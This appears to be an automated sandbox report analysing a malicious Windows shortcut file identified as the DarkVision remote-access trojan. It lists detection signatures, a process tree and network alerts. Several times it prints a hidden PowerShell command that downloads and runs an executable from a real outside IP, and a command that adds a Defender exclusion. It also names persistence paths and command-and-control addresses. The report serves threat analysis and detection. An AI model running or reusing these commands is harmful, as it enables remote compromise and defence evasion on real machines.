Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LPO-0048532025.lnk

Overview

General Information

Sample name:LPO-0048532025.lnk
Analysis ID:1581391
MD5:4dab3e7b78ccfc190b36eb728b6e74d0
SHA1:296f5169adbc438e4ec1610d46c0f451417b7b71
SHA256:b11bfaa78d9b614cf39cc02d64fe8c115085ce39c9b747913705a6520e8a7e7d
Tags:lnkuser-abuse_ch
Infos:

Detection

DarkVision Rat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Windows shortcut file (LNK) starts blacklisted processes
Yara detected DarkVision Rat
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
PE file contains section with special chars
Powershell drops PE file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to evade debugger and weak emulator (self modifying code)
Uses dynamic DNS services
Windows shortcut file (LNK) contains suspicious command line arguments
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7672 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • file.exe (PID: 5980 cmdline: "C:\Users\user\AppData\Local\Temp\file.exe" MD5: A3A87410C13CC37B48A9D63D84798A26)
      • cmd.exe (PID: 6912 cmdline: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1740 cmdline: powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • explorers.exe (PID: 1224 cmdline: "C:\ProgramData\explorers\explorers.exe" {8ACDE7F8-56B2-461C-B2DA-0AAADBA16242} MD5: A3A87410C13CC37B48A9D63D84798A26)
        • cmd.exe (PID: 2220 cmdline: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 4228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2952 cmdline: powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • explorer.exe (PID: 3996 cmdline: "C:\Windows\explorer.exe" MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cmd.exe (PID: 2176 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\{F507C7EB-0460-419E-BE06-0FA6DFA315DF}\{C0EDD55B-2610-4BC4-A06C-A014DB07F034}.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7624 cmdline: cmd /c start "" "C:\ProgramData\explorers\explorers.exe" {8C297CC8-E374-4152-AC22-8BDCBA90B505} MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • explorers.exe (PID: 2092 cmdline: "C:\ProgramData\explorers\explorers.exe" {8C297CC8-E374-4152-AC22-8BDCBA90B505} MD5: A3A87410C13CC37B48A9D63D84798A26)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\file.exeJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
    C:\Users\user\AppData\Local\Temp\file.exeJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      C:\Users\user\AppData\Local\Temp\file.exeINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
      • 0x39748:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      • 0x39678:$s1: CoGetObject
      • 0x39710:$s2: Elevation:Administrator!new:
      C:\ProgramData\explorers\explorers.exeJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
        C:\ProgramData\explorers\explorers.exeJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          Click to see the 1 entries

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000003.00000002.1486314495.00007FF727D2A000.00000080.00000001.01000000.00000007.sdmpJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
            00000003.00000003.1467222665.000000000482B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
              00000003.00000003.1467222665.000000000482B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                00000007.00000002.3824651062.00007FF74B00A000.00000080.00000001.01000000.00000008.sdmpJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
                  0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
                    Click to see the 27 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    20.0.explorers.exe.7ff74afd0000.0.unpackJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
                      20.0.explorers.exe.7ff74afd0000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                        20.0.explorers.exe.7ff74afd0000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                        • 0x38b48:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                        • 0x38a78:$s1: CoGetObject
                        • 0x38b10:$s2: Elevation:Administrator!new:
                        3.0.file.exe.7ff727cf0000.0.unpackJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
                          3.0.file.exe.7ff727cf0000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                            Click to see the 16 entries

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers', CommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers', CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\file.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\file.exe, ParentProcessId: 5980, ParentProcessName: file.exe, ProcessCommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers', ProcessId: 6912, ProcessName: cmd.exe
                            Sigma detected: Suspicious Invoke-WebRequest Execution
                            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", ProcessId: 7672, ProcessName: powershell.exe
                            Sigma detected: Suspicious Script Execution From Temp Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", ProcessId: 7672, ProcessName: powershell.exe
                            Sigma detected: PowerShell Web Download
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", ProcessId: 7672, ProcessName: powershell.exe
                            Sigma detected: Powershell Defender Exclusion
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers', CommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers', CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\file.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\file.exe, ParentProcessId: 5980, ParentProcessName: file.exe, ProcessCommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers', ProcessId: 6912, ProcessName: cmd.exe
                            Sigma detected: Startup Folder File Write
                            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\explorer.exe, ProcessId: 3996, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{BE5C9BF3-0A41-4A6C-B6A8-511461B7BEF1}.lnk
                            Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
                            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", ProcessId: 7672, ProcessName: powershell.exe
                            Sigma detected: Usage Of Web Request Commands And Cmdlets
                            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", ProcessId: 7672, ProcessName: powershell.exe
                            Sigma detected: Non Interactive PowerShell Process Spawned
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", ProcessId: 7672, ProcessName: powershell.exe

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-27T14:53:56.060847+010020456181A Network Trojan was detected192.168.2.104976287.121.86.2143441TCP
                            2024-12-27T14:53:59.159333+010020456181A Network Trojan was detected192.168.2.104976887.121.86.2143441TCP
                            2024-12-27T14:54:00.976299+010020456181A Network Trojan was detected192.168.2.104977487.121.86.2143441TCP
                            2024-12-27T14:54:02.853813+010020456181A Network Trojan was detected192.168.2.104977987.121.86.2143441TCP
                            2024-12-27T14:54:04.730431+010020456181A Network Trojan was detected192.168.2.104978487.121.86.2143441TCP
                            2024-12-27T14:54:06.542515+010020456181A Network Trojan was detected192.168.2.104978987.121.86.2143441TCP
                            2024-12-27T14:54:49.969424+010020456181A Network Trojan was detected192.168.2.104988087.121.86.2143441TCP
                            2024-12-27T14:54:52.973074+010020456181A Network Trojan was detected192.168.2.104988887.121.86.2143441TCP
                            2024-12-27T14:54:54.846016+010020456181A Network Trojan was detected192.168.2.104989387.121.86.2143441TCP
                            2024-12-27T14:54:57.074910+010020456181A Network Trojan was detected192.168.2.104989887.121.86.2143441TCP
                            2024-12-27T14:54:58.886024+010020456181A Network Trojan was detected192.168.2.104990387.121.86.2143441TCP
                            2024-12-27T14:55:00.652070+010020456181A Network Trojan was detected192.168.2.104990987.121.86.2143441TCP
                            2024-12-27T14:55:35.769975+010020456181A Network Trojan was detected192.168.2.104998687.121.86.2143441TCP
                            2024-12-27T14:55:39.258495+010020456181A Network Trojan was detected192.168.2.104999287.121.86.2143441TCP
                            2024-12-27T14:55:41.226888+010020456181A Network Trojan was detected192.168.2.104999387.121.86.2143441TCP
                            2024-12-27T14:55:43.158775+010020456181A Network Trojan was detected192.168.2.104999487.121.86.2143441TCP
                            2024-12-27T14:55:45.539195+010020456181A Network Trojan was detected192.168.2.104999587.121.86.2143441TCP
                            2024-12-27T14:55:47.457956+010020456181A Network Trojan was detected192.168.2.104999687.121.86.2143441TCP
                            2024-12-27T14:56:23.103361+010020456181A Network Trojan was detected192.168.2.104999787.121.86.2143441TCP
                            2024-12-27T14:56:26.261211+010020456181A Network Trojan was detected192.168.2.104999887.121.86.2143441TCP
                            2024-12-27T14:56:28.071210+010020456181A Network Trojan was detected192.168.2.104999987.121.86.2143441TCP
                            2024-12-27T14:56:29.822188+010020456181A Network Trojan was detected192.168.2.105000087.121.86.2143441TCP
                            2024-12-27T14:56:31.830188+010020456181A Network Trojan was detected192.168.2.105000187.121.86.2143441TCP
                            2024-12-27T14:56:33.654581+010020456181A Network Trojan was detected192.168.2.105000287.121.86.2143441TCP
                            2024-12-27T14:57:08.976104+010020456181A Network Trojan was detected192.168.2.105000387.121.86.2143441TCP
                            2024-12-27T14:57:12.131748+010020456181A Network Trojan was detected192.168.2.105000487.121.86.2143441TCP
                            2024-12-27T14:57:13.898040+010020456181A Network Trojan was detected192.168.2.105000587.121.86.2143441TCP
                            2024-12-27T14:57:15.663782+010020456181A Network Trojan was detected192.168.2.105000687.121.86.2143441TCP
                            2024-12-27T14:57:17.483886+010020456181A Network Trojan was detected192.168.2.105000787.121.86.2143441TCP
                            2024-12-27T14:57:19.321950+010020456181A Network Trojan was detected192.168.2.105000887.121.86.2143441TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-27T14:53:58.295619+010020456191A Network Trojan was detected192.168.2.104976287.121.86.2143441TCP
                            2024-12-27T14:54:52.127117+010020456191A Network Trojan was detected192.168.2.104988087.121.86.2143441TCP
                            2024-12-27T14:55:38.253045+010020456191A Network Trojan was detected192.168.2.104998687.121.86.2143441TCP
                            2024-12-27T14:56:25.391295+010020456191A Network Trojan was detected192.168.2.104999787.121.86.2143441TCP
                            2024-12-27T14:57:11.265358+010020456191A Network Trojan was detected192.168.2.105000387.121.86.2143441TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-27T14:53:40.215976+010018100032Potentially Bad Traffic87.120.113.9180192.168.2.1049721TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-27T14:53:40.215931+010018100001Potentially Bad Traffic192.168.2.104972187.120.113.9180TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus detection for URL or domain
                            Source: http://87.120.113.91/image.exeAvira URL Cloud: Label: malware
                            Multi AV Scanner detection for dropped file
                            Source: C:\ProgramData\explorers\explorers.exeReversingLabs: Detection: 44%
                            Source: C:\Users\user\AppData\Local\Temp\file.exeReversingLabs: Detection: 44%
                            Multi AV Scanner detection for submitted file
                            Source: LPO-0048532025.lnkReversingLabs: Detection: 21%
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Machine Learning detection for dropped file
                            Source: C:\ProgramData\explorers\explorers.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\file.exeJoe Sandbox ML: detected
                            Machine Learning detection for sample
                            Source: LPO-0048532025.lnkJoe Sandbox ML: detected

                            Exploits

                            barindex
                            Yara detected UAC Bypass using CMSTP
                            Source: Yara matchFile source: 20.0.explorers.exe.7ff74afd0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.0.file.exe.7ff727cf0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.file.exe.7ff727cf0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.0.explorers.exe.7ff74afd0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.explorers.exe.7ff74afd0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 20.2.explorers.exe.7ff74afd0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.explorer.exe.2f50000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000003.00000003.1467222665.000000000482B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000003.1498847581.0000000003D6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000014.00000002.1652718736.00007FF74B009000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000003.1503466850.0000000003D6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000003.1509023069.0000000003D6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000000.1471512303.00007FF74AFD1000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.1486293762.00007FF727D29000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000014.00000000.1628963449.00007FF74AFD1000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.3824611859.00007FF74B009000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000000.1463459263.00007FF727CF1000.00000080.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000003.1470437170.0000000004826000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: file.exe PID: 5980, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: explorers.exe PID: 1224, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3996, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: explorers.exe PID: 2092, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\file.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\explorers\explorers.exe, type: DROPPED
                            Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: file.exe, 00000003.00000002.1487330600.00007FF72804F000.00000040.00000001.01000000.00000007.sdmp, explorers.exe, 00000007.00000002.3826990355.00007FF74B32F000.00000040.00000001.01000000.00000008.sdmp, explorer.exe, 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmp, explorers.exe, 00000014.00000002.1653947897.00007FF74B32F000.00000040.00000001.01000000.00000008.sdmp
                            Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: file.exe, file.exe, 00000003.00000002.1487330600.00007FF72804F000.00000040.00000001.01000000.00000007.sdmp, explorers.exe, explorers.exe, 00000007.00000002.3826990355.00007FF74B32F000.00000040.00000001.01000000.00000008.sdmp, explorer.exe, explorer.exe, 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmp, explorers.exe, 00000014.00000002.1653947897.00007FF74B32F000.00000040.00000001.01000000.00000008.sdmp
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.10:49721 -> 87.120.113.91:80
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.10:49762 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.10:49774 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.10:49779 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.10:49784 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.10:49768 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.10:49789 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.10:49762 -> 87.121.86.214:3441
